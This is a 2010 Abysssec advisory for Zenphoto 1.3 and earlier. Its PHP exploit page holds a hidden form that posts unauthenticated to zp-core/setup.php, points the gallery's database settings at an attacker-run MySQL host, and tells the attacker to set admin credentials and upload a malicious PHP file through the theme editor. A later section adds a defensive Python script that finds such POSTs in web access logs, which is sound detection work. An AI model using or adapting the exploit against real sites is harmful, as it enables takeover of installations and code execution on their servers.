Zenphoto Config Update and Command Execute Vulnerability
Source: http://www.abysssec.com Author: Abysssec Published: 2010-09-27

<?php
/*

  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/

Abysssec Inc Public Advisory
 
 
  Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
 
*/


$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>

<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
 By : Abysssec @ Inc <br>www.Abysssec.com<hr>
 <form method='POST' action='$path' >
 <input type=hidden name='mysql' value='yes'>
 <input type=hidden name='mysql_user' value='$new_mysql_user'>
 <input type=hidden name='mysql_pass' value='$new_mysql_pass'>
 <input type=hidden name='mysql_host' value='$new_mysql_host'>
 <input type=hidden name='mysql_database' value='$new_mysql_database'>
 <input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
 After clicking the button below, if the target can connect to your Mysql_Host:<br>
 You must see the 'GO !' message ...<br>
 Click and wait ....
 <br> Then, you need to set your admin user and password.<br><hr>
 Upload file:<br>
 You can edit themes from the Themes tab and upload your malignant PHP file.<br>
 <input type=submit value='Send Your Setting '>
 </form>
 ";
echo "</body></html>";
?>
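
The form above sends an unauthenticated POST to zp-core/setup.php, so on an installed gallery any such POST from a non-administrator address is worth reviewing. The following log check is an added example, not part of the Abysssec advisory or of Zenphoto; it assumes Apache/nginx common or combined access-log format, and the trusted_ips allow-list and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SETUP_SUFFIX = "/zp-core/setup.php"  # path the form on this page posts to


def normalize_path(target):
    """Drop the query string, decode %-escapes, collapse '//' and lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()


def find_setup_posts(lines, trusted_ips=frozenset()):
    """Return {client_ip: [(timestamp, status), ...]} for POSTs to setup.php
    that did not come from a trusted (administrator) address."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparsable line, or a plain GET of the setup page
        if not normalize_path(m["target"]).endswith(SETUP_SUFFIX):
            continue
        if m["ip"] in trusted_ips:
            continue
        hits[m["ip"]].append((m["ts"], int(m["status"])))
    return dict(hits)


# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Sep/2010:10:01:02 +0000] "POST /zenphoto/zp-core/setup.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Sep/2010:10:01:09 +0000] "POST /zenphoto//zp-core/Setup.php?x=1 HTTP/1.1" 200 5090',
    '203.0.113.5 - - [27/Sep/2010:10:02:00 +0000] "GET /zenphoto/zp-core/setup.php HTTP/1.1" 200 4000',
    '192.0.2.10 - - [27/Sep/2010:10:03:00 +0000] "POST /zenphoto/zp-core/setup%2Ephp HTTP/1.1" 200 5100',
    '203.0.113.5 - - [27/Sep/2010:10:04:00 +0000] "GET /zenphoto/index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, events in find_setup_posts(SAMPLE_LOG, {"192.0.2.10"}).items():
        print(ip, events)
```

For any flagged request, compare the database host currently in the gallery's configuration with the one the administrator set, since the POST parameters shown above replace it.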


 